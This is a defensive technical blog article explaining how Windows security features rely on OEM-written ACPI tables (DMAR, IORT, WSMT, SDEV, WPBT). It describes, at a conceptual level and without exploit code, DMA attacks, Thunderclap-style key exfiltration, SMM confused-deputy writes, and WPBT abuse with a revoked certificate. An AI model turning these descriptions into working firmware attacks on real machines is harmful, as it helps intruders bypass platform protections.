&lt;p&gt;How is this possible if every box on the security checklist was ticked? The answer is structural. Every modern Windows guarantee -- Credential Guard isolating LSASS in a higher Virtual Trust Level, the &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt; partitioning a Windows Hello IR camera away from kernel-mode drivers, &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; sealing volume keys against PCR[7], Kernel DMA Protection blocking a Thunderclap-class peripheral [@thunderclap-io] -- assumes the &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;hypervisor&lt;/a&gt; came up &lt;em&gt;knowing the correct shape of the platform&lt;/em&gt;. That shape is not discovered by Windows. It is described to Windows, in five small ACPI tables the OEM&apos;s UEFI firmware built before the Windows boot manager even started.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every modern Windows security guarantee assumes the hypervisor came up knowing the correct shape of the platform. That shape is described in five small ACPI tables the OEM&apos;s UEFI firmware built before the Windows boot manager even started. The hardware does the enforcement; the tables decide what gets enforced.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Their names, in the order this article walks them, are &lt;strong&gt;DMAR&lt;/strong&gt; (Intel VT-d, the IOMMU table on x86 [@acpica-actbl1]), &lt;strong&gt;IORT&lt;/strong&gt; (the Arm SMMU analogue [@acpica-actbl2-iort]), &lt;strong&gt;WSMT&lt;/strong&gt; (the OEM&apos;s pact with Microsoft about System Management Mode behaviour [@acpica-actbl3-wsmt]), &lt;strong&gt;SDEV&lt;/strong&gt; (the list of devices the Secure Kernel may wall off from non-secure code [@acpi-65-sdev]), and &lt;strong&gt;WPBT&lt;/strong&gt; (the channel by which the firmware can drop a binary into &lt;code&gt;c:\windows\system32&lt;/code&gt; and run it on every boot [@acpica-actbl3-wpbt]). Each table is a few dozen to a few thousand bytes. Together, they are the firmware-OS contract on which everything else above the hypervisor depends.&lt;/p&gt;
&lt;p&gt;Four questions fall out of that framing, and the rest of this article answers each in turn. &lt;em&gt;Who populates these tables?&lt;/em&gt; &lt;em&gt;Who validates them?&lt;/em&gt; &lt;em&gt;What does Windows do when they are wrong?&lt;/em&gt; &lt;em&gt;What does the attacker get when they forge them?&lt;/em&gt; Along the way we will encounter the design idiom that recurs across every one of the five: the OEM declares a property the operating system has no independent way to verify. Microsoft&apos;s own engineers say so on the public Learn page for WSMT [@ms-oem-uefi-wsmt]. Once you internalise that idiom, the rest of the article reads as five variations on a single theme.&lt;/p&gt;
&lt;p&gt;This is the substrate article in a longer series on Windows platform security. The hypervisor-as-isolation-primitive [@hyperv-sibling], the trustlets that run in the Secure Kernel [@vbs-trustlets-sibling], &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton-as-TPM&lt;/a&gt; [@pluton-sibling], the &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;discrete TPM&lt;/a&gt; [@tpm-sibling], BitLocker [@bitlocker-sibling], &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; [@secure-boot-sibling], application identity and code-integrity policy [@app-identity-sibling], and USB device-arrival policy [@plug-and-trust-sibling] all rest on these five tables. We do not redefine those concepts; we trace where they touch the table set, and we link out where the curious reader wants the deeper tour.&lt;/p&gt;
&lt;p&gt;So: where do these tables come from in the first place? They have a thirty-year history that explains the structural problem.&lt;/p&gt;
&lt;h2&gt;2. ACPI as the Firmware-OS Contract: 1996 to Now&lt;/h2&gt;
&lt;p&gt;How did we get from &quot;describing sleep states&quot; to &quot;deciding whether Credential Guard turns on&quot;? The answer is a thirty-year drift, and it is worth a short tour because each new table answered an attack class the prior contract could not describe.&lt;/p&gt;
&lt;p&gt;ACPI 1.0 shipped in December 1996, jointly authored by Intel, Microsoft, and Toshiba; HP, Huawei, and Phoenix joined later, and in October 2013 the ACPI Special Interest Group transferred all assets to the UEFI Forum, which still publishes the standard today (current revision 6.6, released May 13, 2025) [@wikipedia-acpi]. The original idea was modest: replace the Advanced Power Management 1.x INT 15h real-mode mess with a &lt;em&gt;generic table-passing chassis&lt;/em&gt; the OS could read in protected mode.APM 1.0 shipped in 1992; revision 1.2 in 1996 was the last version of the spec, and Microsoft dropped APM support in Windows Vista [@wikipedia-apm]. APM expected the OS to invoke real-mode BIOS routines through INT 15h; once Windows ran a hardware abstraction layer in protected mode that was no longer architecturally tolerable.&lt;/p&gt;

The firmware-written, OS-read table format that describes a platform&apos;s non-discoverable devices, capabilities, and security properties. The OS finds an entry-point structure (the RSDP) via the EFI system table, walks it to either an RSDT or XSDT, and from there reads typed tables identified by 4-byte ASCII signatures.
&lt;p&gt;The mechanics are uniform. Microsoft&apos;s own bring-up documentation describes them verbatim: &lt;em&gt;&quot;Windows depends on UEFI firmware to boot up the hardware platform . . . The platform firmware fills in the address of either the RSDT or XSDT in the RSDP. (If both table addresses are provided, Windows prefers the XSDT)&quot;&lt;/em&gt; [@ms-acpi-tables]. Each table carries the same 36-byte header (signature, length, revision, checksum, OEM ID, OEM table ID, OEM revision, creator ID, creator revision); the body is signature-specific. The contract: &lt;strong&gt;firmware writes typed tables, the OS reads them, the OS trusts them.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For the first decade of ACPI, every table described power, addressing, or device topology. Then the security tables began to arrive, one per attack class, each one narrowing the gap between &lt;em&gt;what hardware can do&lt;/em&gt; and &lt;em&gt;what the OS believes the hardware will do&lt;/em&gt;.&lt;/p&gt;

timeline
    title ACPI security-table genealogy
    1996 : ACPI 1.0 released (Dec, Intel/Microsoft/Toshiba)
    2007 : DMAR introduced (Intel VT-d / Q35)
    2011 : WPBT spec dated 29 November (Windows 8 era)
    2015 : IORT introduced (ACPI 6.0, April)
    2016 : WSMT v1.0 dated 18 April (Windows 10 v1607)
    2017 : SDEV introduced (ACPI 6.2, May)
    2021 : Eclypsium discloses WPBT revoked-cert acceptance
    2025 : ACPI 6.6 published (May 13)
&lt;p&gt;Timeline date sources, in row order: ACPI 1.0 [@wikipedia-acpi]; DMAR with Intel Q35 [@acpica-actbl1]; WPBT [@acpica-actbl3-wpbt]; IORT in ACPI 6.0 [@acpica-actbl2-iort]; WSMT v1.0 [@acpica-actbl3-wsmt]; SDEV in ACPI 6.2 [@acpica-actbl2-sdev]; Eclypsium 2021 [@eclypsium-wpbt]; ACPI 6.6 May 13, 2025 [@wikipedia-acpi].&lt;/p&gt;
&lt;p&gt;The arc compresses to five timestamps. &lt;strong&gt;DMAR&lt;/strong&gt;, around 2007 with Intel&apos;s Q35 chipset and the first VT-d implementations, was the first ACPI table whose purpose was &lt;em&gt;security&lt;/em&gt; rather than power: it described the IOMMU translation contexts that let the OS confine a peripheral&apos;s DMA reach [@acpica-actbl1]. &lt;strong&gt;WPBT&lt;/strong&gt;, dated November 29, 2011 in the ACPICA conformance comment and shipped with Windows 8 [@acpica-actbl3-wpbt; @eclypsium-wpbt], was the first table whose payload was &lt;em&gt;executable code&lt;/em&gt;: a physical pointer to a binary that Windows would copy into &lt;code&gt;system32&lt;/code&gt; and run. &lt;strong&gt;IORT&lt;/strong&gt;, introduced in ACPI 6.0 in April 2015 [@acpica-actbl2-iort], extended the IOMMU-description idea to Arm; the substrate became pan-architectural. &lt;strong&gt;WSMT&lt;/strong&gt;, version 1.0 dated April 18, 2016 and supported in Windows 10 v1607 [@acpica-actbl3-wsmt; @ms-oem-uefi-wsmt], was the first table whose payload was an &lt;em&gt;OEM warranty about behaviour Windows cannot verify&lt;/em&gt;. &lt;strong&gt;SDEV&lt;/strong&gt;, introduced in ACPI 6.2 in May 2017 [@acpi-65-sdev; @acpica-actbl2-sdev], was the first table whose role was to &lt;em&gt;describe the security partition itself&lt;/em&gt; -- a hint about which devices belong inside the Secure Kernel.&lt;/p&gt;
&lt;p&gt;A pattern unifies them. In every case, the OEM &lt;em&gt;describes&lt;/em&gt; a boundary the OS does not have an independent way to verify. WSMT articulates the principle most explicitly: &lt;em&gt;&quot;Because SMM is opaque to the operating system, it is not possible to produce a test which runs in Windows to verify that the protections prescribed in the WSMT specification are actually implemented in SMM&quot;&lt;/em&gt; [@ms-oem-uefi-wsmt]. The same shape recurs in DMAR (the firmware describes the address-translation policy; Windows trusts that the IOMMU is enabled and that no over-broad reserved memory regions punch holes in it), in SDEV (the firmware lists secure devices; Windows trusts that the listing is correct and complete), and in WPBT (the firmware nominates a binary; Windows trusts that the signature was, until 2021, sufficient to keep adversaries out).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The ACPI security-table set is &lt;em&gt;attestable but not enforceable&lt;/em&gt; from inside Windows. The OEM declares a property; the OS reads the declaration; the OS cannot independently refute lies in the contents. Every generation of mitigation since -- Secured-core PC certification, Pluton-rooted measured boot, Windows Defender Application Control over WPBT -- is an attempt to turn one corner of that unenforceable contract into an enforceable check, either pre-ship, at boot, or per-deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the firmware describes the platform and the OS trusts the description, what happens when the firmware describes a peripheral that can DMA-read your password? That is the IOMMU question. It is the oldest of the five tables, and the cleanest example of the &lt;em&gt;table describes; hardware enforces&lt;/em&gt; pattern. Its name is DMAR -- and on Arm, IORT.&lt;/p&gt;
&lt;h2&gt;3. DMAR and IORT: The IOMMU Tables That Make Kernel DMA Protection Possible&lt;/h2&gt;
&lt;p&gt;In the mid-2000s a researcher named Maximillian Dornseif demonstrated, in 2004, that he could plug an iPod into a locked laptop over FireWire and read the laptop&apos;s physical memory [@wikipedia-dma-attack]. The fix took fifteen years. Here is why.&lt;/p&gt;
&lt;p&gt;The DMA-attack class is older than the IOMMU. FireWire and OHCI 1394 SBP-2 spoofing made it concrete in the 2000s; Thunderbolt 1 (2011) and Thunderbolt 2 (2013) brought the same primitive back through a different connector [@wikipedia-dma-attack]; in February 2019, the Thunderclap NDSS paper by A. Theodore Markettos, Colin Rothwell, Brett F. Gutstein, Allison Pearce, Peter G. Neumann, Simon W. Moore, and Robert N. M. Watson demonstrated that &lt;em&gt;even with the IOMMU on&lt;/em&gt;, OS-side mistakes in &lt;em&gt;what the table describes&lt;/em&gt; let a malicious peripheral exfiltrate keys in seconds [@thunderclap-io]. The paper is the load-bearing academic primary for the entire genre.&lt;/p&gt;

The hardware unit that translates per-device DMA addresses to physical addresses, restricting a peripheral&apos;s DMA reach to assigned pages. On x86 it is Intel VT-d or AMD-Vi; on Arm it is the SMMU. Per Wikipedia: *&quot;Memory is protected from malicious devices that are attempting DMA attacks and faulty devices that are attempting errant memory transfers because a device cannot read or write to memory that has not been explicitly allocated (mapped) for it&quot;* [@wikipedia-iommu].
&lt;p&gt;Microsoft&apos;s first software-side DMA defence appeared in the Windows 7 era as a registry-driven disablement of FireWire SBP-2 attaches when the screen was locked [@wikipedia-dma-attack]. It was a dead end. Thunderbolt brought the same primitive back through a different connector almost immediately, and the only durable answer was to enrol the IOMMU.&lt;/p&gt;
&lt;h3&gt;DMAR: the Intel VT-d table&lt;/h3&gt;
&lt;p&gt;DMAR is the table whose body Windows reads to decide whether DMA remapping is even possible. The ACPICA reference header (&lt;code&gt;actbl1.h&lt;/code&gt;) declares the signature and the conformance: &lt;em&gt;&lt;code&gt;#define ACPI_SIG_DMAR &quot;DMAR&quot;  /* DMA Remapping table */&lt;/code&gt;&lt;/em&gt; and &lt;em&gt;&quot;Conforms to &apos;Intel Virtualization Technology for Directed I/O&apos;, Version 2.3, October 2014&quot;&lt;/em&gt; [@acpica-actbl1].&lt;/p&gt;
&lt;p&gt;The body is a sequence of typed sub-tables. The taxonomy from &lt;code&gt;actbl1.h&lt;/code&gt;, with the byte values that identify each sub-table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Sub-table&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DRHD (Hardware Unit)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;Describes a single VT-d remapping unit and the devices it covers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RMRR (Reserved Memory)&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Identity-mapped memory windows for legitimate firmware-DMA needs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ATSR (Root ATS)&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;PCIe Address Translation Services support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RHSA (Hardware Affinity)&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;NUMA affinity for remapping units&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ANDD (Namespace)&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;ACPI Namespace Device Descriptors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SATC&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;SoC Integrated Address Translation Cache&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SIDP&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;SoC-Integrated Device Property Reporting&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The top-level Flags byte declares three platform-level properties: &lt;code&gt;ACPI_DMAR_INTR_REMAP&lt;/code&gt; (bit 0, interrupt remapping support), &lt;code&gt;ACPI_DMAR_X2APIC_OPT_OUT&lt;/code&gt; (bit 1), and &lt;code&gt;ACPI_DMAR_X2APIC_MODE&lt;/code&gt; (bit 2) [@acpica-actbl1]. Microsoft&apos;s Windows-side opt-in piggy-backs onto the same Flags byte: bit 2 must be set, and the Microsoft OEM Kernel DMA Protection page calls it &lt;code&gt;DMA_CTRL_PLATFORM_OPT_IN_FLAG&lt;/code&gt;, citing &lt;em&gt;Intel VT-d Spec Rev 2.5 Section 8.1&lt;/em&gt; as the authoritative definition [@oem-kernel-dma]. Without that bit set, Memory Access Protection stays off even if VT-d hardware is fully functional.&lt;/p&gt;

The AMD-side analogue is IVRS (I/O Virtualization Reporting Structure), and the OEM opt-in lives in a different field: *&quot;For AMD platforms, system firmware must set &apos;DMA remap support&apos; bit in the IVRS IVinfo field (AMD IOMMU Specification Rev 3.05, Section 5.2.1)&quot;* [@oem-kernel-dma]. DMAR, IVRS, and IORT are mutually exclusive on a given platform; all three are first-class for Kernel DMA Protection. A laptop ships with exactly one of them depending on the silicon vendor.
&lt;h3&gt;IORT: the Arm SMMU table&lt;/h3&gt;
&lt;p&gt;IORT does the same job for the Arm SMMU. The ACPICA header pins the conformance: &lt;em&gt;&lt;code&gt;#define ACPI_SIG_IORT &quot;IORT&quot;&lt;/code&gt;&lt;/em&gt; and &lt;em&gt;&quot;Conforms to &apos;IO Remapping Table System Software on ARM Platforms&apos;, Document number: ARM DEN 0049E.f, Apr 2024&quot;&lt;/em&gt; [@acpica-actbl2-iort]. The node taxonomy, from the same header:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Node type&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ITS_GROUP&lt;/td&gt;
&lt;td&gt;0x00&lt;/td&gt;
&lt;td&gt;GIC Interrupt Translation Service group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NAMED_COMPONENT&lt;/td&gt;
&lt;td&gt;0x01&lt;/td&gt;
&lt;td&gt;Non-PCI named device&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PCI_ROOT_COMPLEX&lt;/td&gt;
&lt;td&gt;0x02&lt;/td&gt;
&lt;td&gt;PCIe root complex&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMMU&lt;/td&gt;
&lt;td&gt;0x03&lt;/td&gt;
&lt;td&gt;SMMUv1 / v2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMMU_V3&lt;/td&gt;
&lt;td&gt;0x04&lt;/td&gt;
&lt;td&gt;SMMUv3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PMCG&lt;/td&gt;
&lt;td&gt;0x05&lt;/td&gt;
&lt;td&gt;Performance Monitoring Counter Group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RMR&lt;/td&gt;
&lt;td&gt;0x06&lt;/td&gt;
&lt;td&gt;Reserved Memory Region (Arm analogue of x86 RMRR)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IWB&lt;/td&gt;
&lt;td&gt;0x07&lt;/td&gt;
&lt;td&gt;I/O Wakeup&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;IORT folds two responsibilities together that x86 keeps separate: in addition to describing SMMU translation contexts, it carries the GIC ITS entries that govern interrupt remapping. (On x86, GIC-ITS-equivalent MSI routing is governed by MADT APIC entries; VT-d interrupt remapping is a separate DMAR hardware capability, also described in the DMAR table via the INTR_REMAP flag.) Each PCI_ROOT_COMPLEX or NAMED_COMPONENT node carries an ID-mapping array of &lt;code&gt;(InputBase, IdCount, OutputBase, OutputReference)&lt;/code&gt; tuples that translate PCIe Requester IDs to SMMU StreamIDs. The mapping arithmetic is the IOMMU. The table just tells the OS where the arithmetic lives.&lt;/p&gt;
&lt;h3&gt;How Windows turns the table into policy&lt;/h3&gt;
&lt;p&gt;Kernel DMA Protection enrols when a small number of conditions all hold. Microsoft&apos;s documentation lays them out [@oem-kernel-dma; @kernel-dma-thunderbolt; @dma-remapping-drivers], and they form a textbook AND-gate.&lt;/p&gt;

flowchart TD
    A[DMAR/IVRS/IORT present?] --&amp;gt;|No| OFF[Kernel DMA Protection: Off]
    A --&amp;gt;|Yes| B[DMA_CTRL_PLATFORM_OPT_IN_FLAG set?]
    B --&amp;gt;|No| OFF
    B --&amp;gt;|Yes| C[VT-d/AMD-Vi/SMMU enabled in firmware setup?]
    C --&amp;gt;|No| OFF
    C --&amp;gt;|Yes| D{&quot;Driver opt-in?&quot;}
    D --&amp;gt;|No, legacy device| OFF2[Device denied DMA, KDP partially enrolled]
    D --&amp;gt;|Yes, RemappingSupported INF directive| ON[Kernel DMA Protection: On for this device]
&lt;p&gt;The driver opt-in deserves a closer look, because it is where Thunderclap left its scar. The legacy mechanism was a per-driver &lt;code&gt;DmaRemappingCompatible&lt;/code&gt; parameter; Windows 24H2 introduced a per-device &lt;code&gt;RemappingSupported&lt;/code&gt; INF directive that supersedes it [@dma-remapping-drivers]. The modern intent is finer-grained: a single driver may legitimately ship across compatible and incompatible device variants, and the per-device declaration is the only safe granularity. Graphics is the canonical hold-out -- WDDM 3.0+ drivers can opt in, but earlier graphics stacks could not, and shipping graphics cards before WDDM 3.0 effectively blocked Kernel DMA Protection on whole platforms [@kernel-dma-thunderbolt].&lt;/p&gt;
&lt;p&gt;When the AND-gate fails, Windows surfaces it as a single line in &lt;code&gt;msinfo32&lt;/code&gt; System Summary: &lt;code&gt;Kernel DMA Protection: Off&lt;/code&gt;. The remediation is rarely software. &lt;em&gt;&quot;Reboot into UEFI settings, Turn on Intel Virtualization Technology, Turn on Intel Virtualization Technology for I/O (VT-d)&quot;&lt;/em&gt; is Microsoft&apos;s own checklist [@kernel-dma-thunderbolt]. If the table is missing entirely, the only fix is an OEM BIOS update.&lt;/p&gt;
&lt;h3&gt;Three failure families, observable from inside Windows&lt;/h3&gt;
&lt;p&gt;Three observable failure families recur. &lt;em&gt;Missing DMAR / IVRS / IORT&lt;/em&gt; surfaces as &lt;code&gt;Kernel DMA Protection: Off&lt;/code&gt; and the only fix is a BIOS update [@kernel-dma-thunderbolt]. &lt;em&gt;Over-broad RMRR / RMR&lt;/em&gt; was the Thunderclap finding: even with the IOMMU on, identity-mapped memory windows that legitimately exist for USB handoff or integrated graphics can overlap sensitive memory; a malicious peripheral assigned to the same context exfiltrates secrets while the IOMMU faithfully reports it as policy-compliant [@thunderclap-io]. &lt;em&gt;VT-d disabled in firmware setup&lt;/em&gt; surfaces identically to a missing table; the remediation is a UEFI menu, not a Windows update.&lt;/p&gt;
&lt;p&gt;{`
function kdpDecision({dmarPresent, optInFlagSet, iommuEnabled, driverRemappingCompatible}) {
  if (!dmarPresent) return &quot;KDP: Off (reason: DMAR/IVRS/IORT table missing -- BIOS update required)&quot;;
  if (!optInFlagSet) return &quot;KDP: Off (reason: DMA_CTRL_PLATFORM_OPT_IN_FLAG not set in DMAR Flags byte)&quot;;
  if (!iommuEnabled) return &quot;KDP: Off (reason: VT-d/AMD-Vi disabled in UEFI setup)&quot;;
  if (!driverRemappingCompatible) return &quot;KDP: Off for that device (reason: driver lacks RemappingSupported INF entry)&quot;;
  return &quot;KDP: On&quot;;
}&lt;/p&gt;
&lt;p&gt;console.log(&quot;Secured-Core PC:    &quot;, kdpDecision({dmarPresent:true, optInFlagSet:true, iommuEnabled:true, driverRemappingCompatible:true}));
console.log(&quot;OEM omission:       &quot;, kdpDecision({dmarPresent:false, optInFlagSet:false, iommuEnabled:true, driverRemappingCompatible:true}));
console.log(&quot;VT-d disabled:      &quot;, kdpDecision({dmarPresent:true, optInFlagSet:true, iommuEnabled:false, driverRemappingCompatible:true}));
console.log(&quot;Driver not opted-in:&quot;, kdpDecision({dmarPresent:true, optInFlagSet:true, iommuEnabled:true, driverRemappingCompatible:false}));
`}&lt;/p&gt;
&lt;p&gt;The Thunderclap residual is the article&apos;s first &lt;em&gt;aha&lt;/em&gt; moment. The IOMMU is on. The hardware is working. The OS has read DMAR and turned on Kernel DMA Protection. And a malicious Thunderbolt device exfiltrates a TLS key in a few seconds, because the &lt;em&gt;table&lt;/em&gt; described an RMRR that overlaps the victim driver&apos;s heap, or because the victim driver shared sensitive memory with a peripheral DMA window. The hardware was not the issue. The &lt;em&gt;table&lt;/em&gt; was. From this point forward in the article, you should not ask &lt;em&gt;&quot;is the IOMMU on?&quot;&lt;/em&gt; You should ask &lt;em&gt;&quot;is the IOMMU on, and did the firmware describe the right thing?&quot;&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; DMAR (Intel), IVRS (AMD), and IORT (Arm) are mutually exclusive on a given platform. All three are first-class for Kernel DMA Protection; the OEM opt-in flag lives in a different field of each, and the Windows-side prerequisites are otherwise the same.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The IOMMU question was an above-the-board hardware boundary. The next question is below-the-board: System Management Mode, the privilege level above the kernel that the OS literally cannot inspect. Microsoft&apos;s response was to make the OEMs sign a pact about it. The pact is a 40-byte ACPI table (a 36-byte ACPI header plus a 4-byte ProtectionFlags field) called WSMT.&lt;/p&gt;
&lt;h2&gt;4. WSMT: Microsoft&apos;s Pact With OEMs About SMM&lt;/h2&gt;
&lt;p&gt;There is a CPU privilege level above the kernel. Windows cannot see what runs there. So Microsoft made the OEMs sign a pact about it.&lt;/p&gt;

An x86 CPU mode entered via System Management Interrupt (SMI). SMM code runs in SMRAM, a region of physical memory the OS cannot map or read. SMI handlers run with full physical-memory access and can read, write, and modify any kernel structure. SMM is sometimes called *ring -2* because it sits architecturally below Hyper-V&apos;s *ring -1*. The Intel 386SL was the first chip to implement it; every modern x86 CPU does [@wikipedia-smm].

A class of attack where a less-privileged caller induces a more-privileged subject to perform an unintended action by passing in attacker-controlled inputs the subject does not validate. In the SMM case, an unprivileged kernel-mode caller hands an SMI handler a pointer to memory the kernel controls; the SMI handler dereferences it without checking whether the target lives inside SMRAM, and the attacker has just bought a write into ring -2.
&lt;p&gt;The attack class is older than the table. UEFI rootkits like LoJax (September 2018), attributed to Sednit / APT28 by ESET, weaponised SMM-adjacent persistence: &lt;em&gt;&quot;This persistence method is particularly invasive as it will not only survive an OS reinstall, but also a hard disk replacement&quot;&lt;/em&gt; [@eset-lojax-html]. The 2015 Hacking Team breach published an entire UEFI rootkit module along with the code-signing certificate that Eclypsium would later reuse in 2021 [@mitre-attack-s0047].The Hacking Team certificate that drove the 2021 Eclypsium WPBT proof-of-concept was the same one shipped with the 2015 Hacking Team UEFI module. A revoked code-signing cert from one breach became the unlock for an unrelated table six years later, because the WPBT signature gate did not check revocation. A software-only OS-side fix to the SMI-handler-pointer-validation problem is impossible by construction: Windows cannot inspect SMM code, and SMRAM is not addressable to it.&lt;/p&gt;
&lt;p&gt;So Microsoft did the only thing that was tractable. On April 18, 2016, version 1.0 of the Windows SMM Security Mitigations Table specification was published [@acpica-actbl3-wsmt]. The body is one 32-bit field. ACPICA codifies it:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct acpi_table_wsmt {
    ACPI_TABLE_HEADER Header;
    UINT32            ProtectionFlags;
} ACPI_TABLE_WSMT;

#define ACPI_WSMT_FIXED_COMM_BUFFERS                (1)
#define ACPI_WSMT_COMM_BUFFER_NESTED_PTR_PROTECTION (2)
#define ACPI_WSMT_SYSTEM_RESOURCE_PROTECTION        (4)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Three bits. Each bit is a warranty by the OEM that their SMI handlers behave correctly in one specific way. Microsoft&apos;s published semantics, paraphrased lightly so the bits read as English [@ms-oem-uefi-wsmt]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flag&lt;/th&gt;
&lt;th&gt;Bit&lt;/th&gt;
&lt;th&gt;What the OEM warrants&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;FIXED_COMM_BUFFERS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x1&lt;/td&gt;
&lt;td&gt;All SMI communication buffers live in firmware-allocated memory of fixed location and size; SMM never reads or writes outside those buffers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;COMM_BUFFER_NESTED_PTR_PROTECTION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x2&lt;/td&gt;
&lt;td&gt;Pointers nested inside those buffers are validated against the same allowed regions before SMM dereferences them (the confused-deputy fix)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SYSTEM_RESOURCE_PROTECTION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x4&lt;/td&gt;
&lt;td&gt;Critical platform resources (CPU MSRs, chipset registers) are guarded from unintended SMM modification by lower-privilege callers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;When does Windows read this table? &lt;em&gt;&quot;Supported versions of the Windows operating system read in the Windows SMM Security Table early during initialization, prior to start of the ACPI interpreter&quot;&lt;/em&gt; [@ms-wsmt-fixed-combuffer]. &lt;em&gt;Prior to start of the ACPI interpreter&lt;/em&gt; is the load-bearing phrase. Windows has not yet booted the hypervisor when it consumes WSMT; it has not yet decided whether to launch VBS. The table is read first; the decision follows.&lt;/p&gt;

sequenceDiagram
    participant FW as OEM Firmware (build time)
    participant POST as POST / DXE
    participant BL as Windows Boot Manager
    participant WBL as Winload.efi
    participant HV as Hyper-V
    participant VBS as VBS / Secure Kernel
    FW-&amp;gt;&amp;gt;POST: Build WSMT with ProtectionFlags
    POST-&amp;gt;&amp;gt;BL: Hand off ACPI table set via EFI system table
    BL-&amp;gt;&amp;gt;WBL: Load winload.efi
    WBL-&amp;gt;&amp;gt;WBL: Read WSMT prior to ACPI interpreter start
    alt Flags == 0x7 (all three asserted)
        WBL-&amp;gt;&amp;gt;HV: Launch hypervisor
        HV-&amp;gt;&amp;gt;VBS: Start Secure Kernel, enrol Credential Guard / HVCI
    else Flags partial or missing
        WBL-&amp;gt;&amp;gt;WBL: De-feature: VBS may not start, HVCI may stay disabled
    end
&lt;p&gt;The OEM-VBS page makes WSMT a hard prerequisite, not a nice-to-have: &lt;em&gt;&quot;Firmware support for SMM protection -- System firmware must adhere to the recommendations for hardening SMM code described in the Windows SMM Security Mitigations Table (WMST) specification . . . Firmware must implement the protections described in the WSMT specification, and set the corresponding protection flags as described in the specification to report compliance with these requirements to the operating system&quot;&lt;/em&gt; [@oem-vbs]. If the flags are clear, VBS may de-feature. Memory Integrity may not enable. Credential Guard may refuse to start. The customer never sees a banner; they see the absence of a feature.&lt;/p&gt;
&lt;blockquote&gt;
